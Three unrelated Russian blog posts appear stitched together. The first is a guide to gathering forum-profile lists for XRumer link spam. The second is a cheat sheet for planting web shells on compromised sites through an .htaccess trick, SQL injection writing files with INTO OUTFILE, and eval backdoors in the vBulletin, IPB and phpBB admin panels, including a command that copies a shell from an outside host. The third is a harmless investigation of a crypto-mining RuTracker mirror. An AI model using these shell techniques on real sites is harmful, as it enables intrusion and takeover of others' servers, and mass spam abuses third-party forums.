Хитрый способ сбора качественной пробиваемой базы для XRUMER
Всем привет! Ни для кого не секрет, что каким бы замечательным не был софт для массовой регистрации/рассылки, без надлежащего качества баз он почти не имеет ценности. Базы можно добыть различными способами – спарсить самому /купить /найти в паблике/etc. Каждый вариант хорош по – своему и у каждого из них есть свои плюсы и минусы.
Паблик базы. Основной плюс это бесплатность. Часто в паблик сливаются и покупные базы, так что найти стоящие все-таки можно, другое дело что по этим базам будет работать сразу большое количество вебмастеров(как с лиц, так и с ломаным хрумом) и они быстро превратятся в помойку, а как известно, 1 трастовая ссылка зачастую лучше чем 1000 с гавносайтов.
Покупка базы. В основном это лотерея. Селлеров сейчас достаточное количество, но еще больше барыг, которые покупают и перепродают базы, выдавая за свои свежеспарсенные.Данный метод получения базы хорош в том случае если вы дорожите своим временем и покупаете базу у проверенного временем человека.
Самостоятельный парсинг. Самый лучший, но в тоже время затратный вариант. Для успешного парсинга нужно обладать словарем по тематике, признаками для парсинга + свежими прокси/соксами, если вы соберетесь парсить google, к примеру. Разумеется нужен и сам парсер, для хрумоводом все проще, так как с хрумером идет Hrefer, но все же я рекомендовал еще купить что-нибудь дополнительно. Лично я использую webparser, хотя многие хвалят a-parser, в общем кто на что горазд и у кого какие потребности.
База собранная собственноручно дает небольшое временное преимущество над другими вебмастерами, но не стоит думать, что собрав скажем базу форумов по хорошим признакам вы не обнаружите на доброй половине из них спам от «собратьев по оружию», но в любом случае свежеспаршенные (сырые) базы будут лучше паблик и зачастую лучше покупных, но как говорится этот вариант для тех у кого хорошие аппаратные мощности + есть время.
Есть конечно же еще варианты – утащить с чужого сервера, пропарсить интернет по примерно такому запросу
Пример лота в телдери:
_http://www.telderi.ru/ru/viewsite/67448
Как видим: “также прогонялся по профилям, прогон по профилям и каталогам был осуществлен 30 дней назад”, значит это “наш клиент”. Копируем урл сайта к себе в текстовый файл.
Таким нехитрым способом мы собираем БАЗУ сайтов, которые когда-либо прогонялись хрумером или ручками по трастовым сайтам. Отмечу тот факт, что большинство прогонщиков работают с дефолтным хрумером без измененного файла xas_AI.txt, что опять же нам на руку.
Буквально за час, можно собрать около 200 урлов сайтов, которые были «запачканы» прямым прогоном хрумером. Далее мы идем пополнять коллекцию на SEO форумы, там мы ищем темы с прогонами и смотрим на отзывы, форумов полно, для примера :
_http://www.maultalk.com/forum38.html
Далее идем по популярным веткам прогонщиков и смотрим в темах тех, кто оставлял отзывы об услуге. В 85% случаев, если у них заполнено поле сайт в профиле и подпись, то там находится их сайт, по которому они заказывали прогон, причем зачастую не один.
Работа по сбору таких урлов немного нудная, но зато эффект будет достойным(пока поверьте на слово).
После 2-3 часов работы, которую можно сбагрить на аутсорс толковому школьнику за 100-150 рублей с , мы получаем приличный список сайтов, теперь дело за малым – вытащить обратные ссылки.
Для начала идем в _ http://ahrefs.com и (можно воспользоватся другим софтом/сервисами) и извлекаем ВСЕ обратные ссылки
.
Данную нудную работу тоже лучше поручить кому-то.
Вторым этапом будет подготовка урлов для парсинга, и тут опять следует небольшая хитрость.
Нужно составить запросы для ПАРСИНГА примерно такого вида, приведу пример для сайт
«Просмотр профиля» https://сайт/
«Профиль» https://сайт/
«Профиль пользователя» https://сайт/
«Пользователь» https://сайт/
«Сайт» https://сайт/
«Домашняя страница» https://сайт/
«user» https://сайт/
«member» https://сайт/
«profile» https://сайт/
Просто ввести название домена в кавычках «https://сайт»
Просто погуляйте по форумам и посмотрите как выглядят там профили.
Сделать список таких признаков и урлов вам поможет EXCEL и оператор &
В одной колонке у вас урлы, в другой наши простенькие “признаки”:
Наглядный пример:
>>>> <<<<
Что мы получается на выходе на выходе? База профилей в 100% индексе яндекса или гугла, большинство из которых пробивает дефолтный хрумер.
С такими нехитрыми признаками мы парсим ПС (я, обычно, ограничиваюсь Яшей и Гошей)
Безусловно, таким способом соберется много дублей, но база профилей получится достаточно качественная и индексируемая. Никогда не гонитесь за количеством, лучше купить/собрать базу базу из 1000 профилей которые попадают в индекс, чем из 40000 закрытых в индексации и тд.
Основная часть (2)
: В статье про я упомянул про то, что с помощью этих 3 баз можно собрать неплохую базу под хрумер и я вам не врал.
Для начала стоит скачать все 3 базы – ru, su, РФ:
Https://partner.r01.ru/ru_domains.gz
Https://partner.r01.ru/su_domains.gz
Https://partner.r01.ru/rf_domains.gz
Далее скомпоновать из них 1 большой файл с урлами. ВНИМАНИЕ! Данная операция требует больших аппаратных мощностей, если вы ими не обладаете, поделите базы на куски с помощью KeyWordKeeper (скачать можно по ссылке – _) и продолжайте.
После создания большой базы, нам в любом случае придется прибегнуть к помощи KeyWordKeeper, так как всеми нами любимый EXCEL плохо работает с файлами, где больше 1 000 000 строк, поэтому делим нашу базу на куски по 900 000. Получится достаточно много файлов.
Теперь нужно включить голову и подумать, какие конструкции наиболее часто применимы для форумов.
В базе уже содержится приличное количество форумов, но часто форумы создаются на поддоменах основного сайта и не попадают в базу.
Как в основном выглядят поддомены?
Сайт.ру/forum
Сайт.ру/talk
Forum.
Сайт.ру
Talk.
сайт.ру
+ другие вариации
. Соответственно нам нужно добавить talk и forum к существующим URL, делает это все тем же экселевским оператором &
+ сочетанием клавиш CTRL + ENTER для применения формулы ко всему списку.
Теперь самое вкусное, в конце рабочего дня мы все что сделали компонуем в 1 большой файл, перемешиваем и запускаем хрумер в режиме «только регистрация».
Учитывая, что база сырая + многих ресурсов просто не существует, мы ведь только предполагаем что там есть поддомены с форумами, при 100 потоках и 6 мегабитном канале скорость будет составлять около 1200-1600 ссылок (+ многое зависит от железа), те у кого с железом и с каналом дела обстоят лучше прогонят эту базу за пару дней, у остальных же примерно это займет около недели с небольшим. Вторым этапом запускаем редактирование профиля.
В итоге вы получаете на ~65% русскоязычную базу профилей, состоящую из ~8000-9000 ресурсов (у меня вышло примерно столько), где просто проставлена ссылка вида «https://сайт/», активных и не закрытых к индексации ссылок будет в 3-4 раза меньше. Данным способом собираются не только форумные профили, но и профили на движке DLE и тд. Если подойти к делу основательно – найти много сайтов + делать прогоны в несколько раз, чтобы выжать из базы максимум – то можно выжать еще сверху 15-20% ресурсов.
Cпособ можно модернизировать и собирать с помощью него ресурсы любого типа. Статья в первую очередь предназначена для новичков, которые только учатся собирать базы и позволяет за 1 день подготовки собрать базу, которой можно пользоваться несколько месяцев.
Для тех кто не хочет с этим делом заморачиваться, может купить у меня личную базу из 13 000 профилей, собранную данным методом с добавлением ресурсов из ЯК и DMOZ + другие источники (с ценником пока не определился, но если будет спрос, то думаю, 20-25 WMZ вполне адекватная цена).
Надеюсь статья оказалась для вас полезной. Заранее извиняюсь за плохое превью скриншотов + отсутствие видео материала, со временем постараюсь поправить.
Всем хорошего дня!
Привет %username% и его друзья. Ну вот нужно срочно залить шелл на сайт, ну мало ли, может конечный гонорар от этого зависит. Ну а никак не получается. Вот собрал пару примеров (спасибо tracy и другим за это).
Льем шелл через картинку
Вы взломали сайт (разумеется только тестируете) с самописной админкой… И не можете залит веб-шелл, но там присутствует заливка картинок и загружает только форматы.jpg, .gif, .png.
Что в этом случаем можно сделать?
Пихаем шелл с расширением.gif в какую нибудь папку с картинками, и создаем файл.htaccess с содержимым
AddType application/x-httpd-php .gif
Данная команда выполнит формат.gif как php
Пробуем открыть /shell.gif
Так же, если скрипт не равнодушен к переносу строки, пробуем залить шелл попутно переименовав его в shell.php%00.jpg , проверять доступность shell.php, а вдруг?
Способ заливки шелла через mysql.user из скули
1)Узнаем из под кого мы сидим и узнаем так же его права к mysql.
site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Узнаем под кем мы сидим)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user="наш юзер
"+--+
(Проверим привилегии нашего юзера. Если выдаёт ошибку при выводе, можно похексить нашего юзера 0x)
3) site.com/index.php?id=-1+union+select+1,"",3+from+mysql.user+into+outfile+"Путь до файла
"+--+
(Заливаем мини-шелл)
P.S
Что бы всё получилось нужно имееть права на запись и знать полный путь до корня.
Так же проверить права на запись можно так:
site.com/index.php?id=1+and+1=0+union+Select+1,"prava
",3+from+mysql.user+--+
Если prava отобразится, то права есть.
Следующая ситуация. Мы в админке форумного движка vBulletin
Заходим:
Plugins & Products -> Plugin Manager -> Плагины & Продукты -> Менеджер плагинов -> [Добавить новый плагин]
Выбираем темптлей. Обычно выбирают faq_complete, выбираем и жмем галочку Plugin is Active выставляем «Yes» и сохраняем.
localhost/forum/faq.php?cmd=phpinfo();
Если мы вывели phpinfo() то считайте шелл у нас в руках.
Далее в phpinfo нужно найти полный путь до форума (например /home/u0000/site.ru/www/sell.php)
. Далее нам нужно наш веб-шелл превратить в txt файл и залить на любой сайт
mysite.com/shell.txt
Шелл заливаем командой
localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Что делает эта команда? Она копирует содержимое переменной [a] в переменную [b], то есть shell.txt копирует в shell.php
Заливаем шелл в IPB 3
Заходим:Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос
Код:
select 0x3c3f706870696e666f28293b3f3e into outfile "Z:/home/site.ru/www/uploads/shell.php"
Полный путь можно посмотреть так:
Админка->Поддержка
Там будет сверху написана версия PHP и слева ссылка на PHPINFO
Шелл тут:
http://site.com/uploads/shell.php
Заливаем шелл в phpBB 2
1. Создаём файл ex.sql
2. Прописываем туда
UPDATE phpbb_users SET user_sig_bbcode_uid="(.+)/e\0", user_sig="phpbb:eval(stripslashes($_GET[e]));" WHERE user_id=2;
Где user_id=2 — идентификатор администратора
3. Заходим в админ-панель
4. В админ-панеле выбираем пункт «Восстановить БД» и загружаем ex.sql
5. Выполняем код / Заливаем шелл так
Заходим:
http://target/profile.php?mode=editprofile&e=phpinfo();
После:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Что бы вывести phpinfo() нужно быть авторизованным.
Это только коротенький список, как и на какие движки можно залить шелл. Нужно больше? Welcome к ребятам на rdot
заливка на форумы
заливка на cms
А вот и мой любимый шелл, тоже на rdot))
Я писал о том, что при попытке залогиниться на одном из зеркал RuTracker, выдается сообщение о том, что это возможно лишь с тем условием, если вы разрешите сайту выполнять вычисления на вашем компьютере, другими словами - майнить криптовалюту.
После этого, мне в комментарии посыпались гневные сообщения о том, что я на самом деле дурак, а описываемые мною зеркала не принадлежат рутрекеру и никоим образом они не связаны с самим рутрекером. Я не сильно придавал этому значения и в комментариях к той заметке задал вопрос, а как же быть с тем, что зеркало rutracker-org.appspot.com повторяет не только дизайн официального сайта рутрекера rutracker.org , но и полностью повторяет его содержимое. Однако в ответ на это я услышал что, цитирую: "Дурак ты Волох и ничего не понимаешь ".
Как и подобает здравомыслящему человеку - он начинает задумываться над следующим: если мне говорят что я дурак, то может быть так оно и есть? Я тоже так подумал, оказалось что нет - в этой ситуации я не дурак. Но обо всем по порядку.
После того, как в комментариях админы RuTracker начали говорить о том, что:
Других зеркал и "дочерних проектов" у нас нет! Все остальные "клоны" рутрекера, дублирующие нашу структуру и дизайн, к нам никакого отношения не имеют, их использование может привести к краже паролей, задействованию вашего компьютера для майнинга криптовалют и иным неприятностям! Мэйнтрекер - это также фейк!!
Я стал задумываться, может быть действительно я погорячился и зря наговариваю на ребят из RuTracker. Ладно, я решил сравнить комментарии с официального сайта RuTracker - rutracker.org и комментарии с зеркала рутрекера rutracker-org.appspot.com , который запрашивал разрешение на генерацию криптовалюты. Оказалось, что комментарии полностью идентичные. Но мне же никто не поверит - решил я, и хотел сделать скриншоты. Но и эта затея показалась глупой, т.к. комментарии легко удаляются и редактируются.
Самой лучшей идеей стала запись видео. Смотрим, а потом я прокомментрирую что тут происходит:
Посмотрели? Сразу скажу, что видео выставляю "как оно есть", то есть без монтажа. Поэтому оно без каких-либо комментариев или озвучки. Итак, давайте разберемся что тут происходит.
Для начала я создал почтовый ящик, чтобы зарегаться на сайте rutracker-org.appspot.com . Да, именно на том сайте, который майнит криптовалюту. Почему именно на нем, а не на официальном сайте rutracker.org ? Дело в том, что передо мной стояла задача показать то, что у сайтов rutracker-org.appspot.com и rutracker.org одна база данных, то есть эти сайты между собой взаимосвязаны вопреки заявлениям админов рутрекера.
После того, как я завел почту, я открыл браузер Tor и загрузил три вкладки:
1. Официальный сайт rutracker.org ;
2. Зеркало RuTracker rutracker-org.appspot.com ;
3. Вкладку с открытым почтовым ящиком.
После этого, на зеркале RuTracker rutracker-org.appspot.com я произвел регистрацию (Time 00:25) и в мой почтовый ящик пришло письмо с активацией учетной записи (Time 00:57). И вот здесь уже начинается интересные танцы, точнее жуткие пляски с подгоранием пятой точки админов сайта: в коде активации указана ссылка на официальный сайт трекера (Time 1:00):
https://rutracker.org/forum/profile.php?mode=activate&u=43055955&act_key=nUMiXqWX19EF
Эта ссылка рабочая и она ведет именно на официальной сайт rutracker.org . Перейдя по ссылке, учетная запись, созданная на зеркале rutracker-org.appspot.com успешно активировалась на официальном сайте rutracker.org (Time 1:06). Во чудеса техники и админской чудо-мысли. Кажется у админов сайта начинает что-то дымиться. Да и ладно, я же дурак как они сказали, что с меня взять. Идем дальше.
После успешной активации учетной записи, я отправляюсь на зеркало rutracker-org.appspot.com и произвожу попытку залогиниться на сайте (Time 1:45). После ввода капчи, я успешно захожу под созданной учетной записью на "неофициальном" трекере (Time 2:03). И в этот момент появляется то самое уведомление (Time 2:07):
Я нажимаю на кнопку "Разрешить" (Time 2:08), так как в противном случае я бы не смог залогиниться. После этого, показываю, что личка пуста и я еще не оставлял никаких комментариев (Time 2:20).
Теперь, для того, чтобы показать взаимосвязь зеркала и официального сайта, я выбираю рандомную раздачу на сайте rutracker-org.appspot.com и оставляю комментарий (Time 3:10). После чего, на официальном сайте rutracker.org произвожу попытку залогиниться (Time 3:40) с учетной записью, созданной на зеркале рутрекера. И о чудо - логин и пароль от "неофициального" зеркала подошел к официальному сайту (Time 4:00). Совпадение? Не думаю.
Идем дальше, открываем список сообщений, оставленных на трекере и что мы видим: знакомая раздача в списке тем (Time 4:05). Наверное тоже совпадение и для пущей убедительности открываю оставленный мною комментарий к этой раздаче на непризнаваемом админами зеркале (Time 4:17).
Сравниваем комментарий к раздаче с сайта rutracker-org.appspot.com и rutracker.org (Time 5.54) и еще раз убеждаемся в том, что эти два сайта взаимосвязаны.
А что мне писали админы сайта? Кажется они убеждали меня в том, что официальный сайт и зеркало rutracker-org.appspot.com никак между собой не взаимосвязаны. В комментариях админов трекера четко говорится о том, что все зеркала просто лишь дублируют структуру и дизайн сайта, но не связаны между собой. Однако из увиденного получается, что официальный сайт копирует комментарии с какого-то левого зеркала? Да нет, тоже бред. А где же истина? Истина в том, что у этих двух сайтов одна база данных, а зеркал множество, одни из которых признаются админами трекера, а другие не признаются и используются для генерации криптовалюты.
Получается что все это время, мне в комментариях пытались лить в уши какую-то ахинею и убеждать меня в том, что я якобы зашел совсем на левый сайт, а на деле оказалось что этот сайт также принадлежит RuTracker.
Подозреваю, что сейчас у некоторых людей начнется синдром воспламенения пятой точки и посыпятся угрозы, оскорбления и т.п. А ведь я уже и вправду подумал, что зря наезжаю на ребят и они ни в чем не виноваты. Оказалось все совсем иначе и видео тому доказательство. Как сказал коллега: RuTracker - ты был мне как брат .
